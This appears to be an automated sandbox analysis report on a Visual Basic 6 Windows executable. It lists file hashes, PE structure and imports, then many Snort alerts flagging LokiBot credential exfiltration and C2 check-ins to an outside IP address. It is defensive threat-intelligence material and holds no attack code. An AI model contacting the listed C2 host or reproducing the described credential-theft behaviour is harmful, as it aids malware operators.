                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name: PO-A2174679-06.exe
                            File size: 86016
                            MD5: fdec289fb4626dd56bbb55770ae5f432
                            SHA1: 1a1f324185e6114fb1362b00f27fe8009a202361
                            SHA256: eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
                            SHA512: 59cbf20bc1d2fb24430378ec9fa74107c91a6f491b51e9b04911ecd632cce524d4bd56042df8b3bcd8acd448d984bba6290cffa6739960e188d8c055c0f0b0f4
                            SSDEEP: 1536:WafMF8sN5NZilPSBWNBEotYaYUtl8DLogSR:WHF95ilSUNBLtYaYUt7
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....5U................. ... ...............0....@................

                            File Icon

                            Icon Hash: 74fae4f6c0c0f98c

                            Static PE Info

                            General

                            Entrypoint: 0x4014c0
                            Entrypoint Section: .text
                            Digitally signed: false
                            Imagebase: 0x400000
                            Subsystem: windows gui
                            Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                            DLL Characteristics:
                            Time Stamp: 0x553582A1 [Mon Apr 20 22:50:09 2015 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major: 4
                            OS Version Minor: 0
                            File Version Major: 4
                            File Version Minor: 0
                            Subsystem Version Major: 4
                            Subsystem Version Minor: 0
                            Import Hash: 40c19fc273c48bb96f5b0a0c56f8b80b

                            Entrypoint Preview


                            Data Directories

                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x11d54 | 0x28 | .text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x8d0 | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x124 | .text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                            Sections

                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0x11234 | 0x12000 | False | 0.394232855903 | data | 6.11276286566 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .data | 0x13000 | 0xac8 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc | 0x14000 | 0x8d0 | 0x1000 | False | 0.12939453125 | data | 1.94796497587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            Name | RVA | Size | Type | Language | Country
                            RT_ICON | 0x14368 | 0x568 | GLS_BINARY_LSB_FIRST | |
                            RT_GROUP_ICON | 0x14354 | 0x14 | data | |
                            RT_VERSION | 0x140f0 | 0x264 | data | Chinese | Taiwan

                            Imports

                            DLL | Import
                            MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                            Version Infos

                            Description | Data
                            Translation | 0x0404 0x04b0
                            InternalName | yappingextr
                            FileVersion | 1.06
                            CompanyName | V.Q. Benney
                            ProductName | Project5
                            ProductVersion | 1.06
                            FileDescription | V.Q. Benney
                            OriginalFilename | yappingextr.exe

                            Possible Origin

                            Language of compilation system | Country where language is spoken
                            Chinese | Taiwan

                            Network Behavior

                            Snort IDS Alerts

                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            02/23/21-08:49:25.317523 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:25.317523 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:25.317523 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:25.317523 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49732 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:26.296646 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49733 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:27.514702 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49734 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:29.621978 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49735 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.069635 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49736 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:31.953353 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49737 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:32.896542 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49738 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:33.755838 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49739 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:34.630259 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49740 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:35.508751 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49741 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:38.359104 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49743 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:39.237474 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49744 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:40.069118 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49745 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.025088 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49746 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:41.847378 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49747 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:42.711982 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49748 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:43.540303 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49749 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:44.361483 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49750 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:45.281076 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49751 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:46.290244 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49752 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.113450 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49753 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:47.991495 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49755 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:48.867385 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49759 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:49.698286 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49761 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:50.602565 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49763 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49765 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49765 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49765 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:51.403125 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49765 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:52.189175 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49766 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:52.189175 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49766 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:52.189175 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49766 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:52.189175 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49766 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.017835 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49767 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.017835 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49767 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.017835 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49767 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.017835 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49767 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.820833 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49768 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.820833 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49768 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.820833 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49768 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:53.820833 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49768 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:54.628473 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49769 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:54.628473 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49769 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:54.628473 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49769 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:54.628473 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49769 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:55.479698 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49770 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:55.479698 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:55.479698 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:55.479698 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49770 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:56.264238 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49771 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:56.264238 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49771 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:56.264238 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49771 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:56.264238 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49771 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:57.090884 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49772 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:57.090884 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49772 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:57.090884 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49772 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:57.090884 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49772 | 80 | 192.168.2.5 | 192.185.78.145
                            02/23/21-08:49:57.912353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.5192.185.78.145
                            02/23/21-08:49:57.912353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977380192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.5192.185.78.145
                            02/23/21-08:49:58.700266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977480192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.5192.185.78.145
                            02/23/21-08:49:59.551681TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2025381ET TROJAN LokiBot Checkin4977680192.168.2.5192.185.78.145
                            02/23/21-08:50:00.379572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977680192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.5192.185.78.145
                            02/23/21-08:50:01.225792TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.5192.185.78.145
